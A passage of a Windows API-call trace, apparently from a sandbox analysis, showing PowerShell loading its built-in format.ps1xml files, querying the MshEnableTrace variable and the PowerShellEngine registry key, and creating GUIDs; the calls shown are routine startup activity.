	[0409.301] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0409.301] SetErrorMode (uMode=0x1) returned 0x1
	[0409.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.302] SetErrorMode (uMode=0x1) returned 0x1
	[0409.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.302] SetErrorMode (uMode=0x1) returned 0x1
	[0409.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.302] SetErrorMode (uMode=0x1) returned 0x1
	[0409.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.302] SetErrorMode (uMode=0x1) returned 0x1
	[0409.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.302] SetErrorMode (uMode=0x1) returned 0x1
	[0409.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0409.303] SetErrorMode (uMode=0x1) returned 0x1
	[0409.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.303] SetErrorMode (uMode=0x1) returned 0x1
	[0409.303] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0409.303] SetErrorMode (uMode=0x1) returned 0x1
	[0409.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0409.303] SetErrorMode (uMode=0x1) returned 0x1
	[0409.303] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0409.303] SetErrorMode (uMode=0x1) returned 0x1
	[0409.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.304] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.304] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.304] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0409.304] SetErrorMode (uMode=0x1) returned 0x1
	[0409.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0409.305] SetErrorMode (uMode=0x1) returned 0x1
	[0409.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d580 | out: lpFileInformation=0x20d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0409.305] SetErrorMode (uMode=0x1) returned 0x1
	[0409.305] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0409.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.305] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0409.308] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0409.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.309] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0409.309] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0409.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.309] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0409.309] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0409.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.309] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0409.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.310] SetErrorMode (uMode=0x1) returned 0x1
	[0409.310] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.310] GetFileType (hFile=0x2fc) returned 0x1
	[0409.310] SetErrorMode (uMode=0x1) returned 0x1
	[0409.310] GetFileType (hFile=0x2fc) returned 0x1
	[0409.310] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.312] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x9e2, lpOverlapped=0x0) returned 1
	[0409.313] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b07d2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b07d2*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.313] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b1288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33b1288*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.313] CloseHandle (hObject=0x2fc) returned 1
	[0409.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.313] SetErrorMode (uMode=0x1) returned 0x1
	[0409.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.313] SetErrorMode (uMode=0x1) returned 0x1
	[0409.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0409.314] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0409.314] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6c50
	[0409.314] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x1b8a6c50, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0409.314] CoTaskMemFree (pv=0x1b8a6c50) 
	[0409.314] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.321] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xfbb30187, Data2=0xa319, Data3=0x4ed8, Data4=([0]=0x9a, [1]=0xcd, [2]=0xf3, [3]=0x8a, [4]=0xc5, [5]=0x2b, [6]=0x3c, [7]=0x13))) returned 0x0
	[0409.643] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xbdfe8a3d, Data2=0x7dc3, Data3=0x4fdd, Data4=([0]=0x86, [1]=0x51, [2]=0xdb, [3]=0x4, [4]=0x6f, [5]=0xb7, [6]=0x2b, [7]=0x37))) returned 0x0
	[0409.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.644] SetErrorMode (uMode=0x1) returned 0x1
	[0409.644] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.644] GetFileType (hFile=0x2fc) returned 0x1
	[0409.644] SetErrorMode (uMode=0x1) returned 0x1
	[0409.644] GetFileType (hFile=0x2fc) returned 0x1
	[0409.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0xfb2, lpOverlapped=0x0) returned 1
	[0409.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x33db50a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33db50a*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x33dbdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x33dbdf0*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.647] CloseHandle (hObject=0x2fc) returned 1
	[0409.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.647] SetErrorMode (uMode=0x1) returned 0x1
	[0409.647] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.647] SetErrorMode (uMode=0x1) returned 0x1
	[0409.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.647] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0409.647] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0409.647] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6c50
	[0409.647] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x1b8a6c50, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0409.647] CoTaskMemFree (pv=0x1b8a6c50) 
	[0409.648] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.649] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xdf93ce63, Data2=0x2860, Data3=0x4185, Data4=([0]=0xba, [1]=0x64, [2]=0xf4, [3]=0xe, [4]=0x0, [5]=0xcc, [6]=0xe2, [7]=0x67))) returned 0x0
	[0409.653] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xdee54619, Data2=0x85a1, Data3=0x41d6, Data4=([0]=0xa7, [1]=0xab, [2]=0x33, [3]=0x14, [4]=0x3c, [5]=0x4c, [6]=0x65, [7]=0x39))) returned 0x0
	[0409.654] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc5411491, Data2=0x4d06, Data3=0x40ea, Data4=([0]=0x8a, [1]=0x56, [2]=0x75, [3]=0xaf, [4]=0xa6, [5]=0xd5, [6]=0x2e, [7]=0x1e))) returned 0x0
	[0409.655] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf093ccd3, Data2=0xd5b2, Data3=0x422b, Data4=([0]=0x83, [1]=0xa, [2]=0x43, [3]=0x5, [4]=0x70, [5]=0x4d, [6]=0xbc, [7]=0x9b))) returned 0x0
	[0409.655] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8868eb15, Data2=0x4248, Data3=0x41ca, Data4=([0]=0xb0, [1]=0xc4, [2]=0xf4, [3]=0x97, [4]=0x0, [5]=0x6c, [6]=0x28, [7]=0x97))) returned 0x0
	[0409.656] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x5fe84a5d, Data2=0x1a66, Data3=0x47bf, Data4=([0]=0xb0, [1]=0xb7, [2]=0xeb, [3]=0x0, [4]=0x33, [5]=0xc4, [6]=0xb2, [7]=0x34))) returned 0x0
	[0409.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.656] SetErrorMode (uMode=0x1) returned 0x1
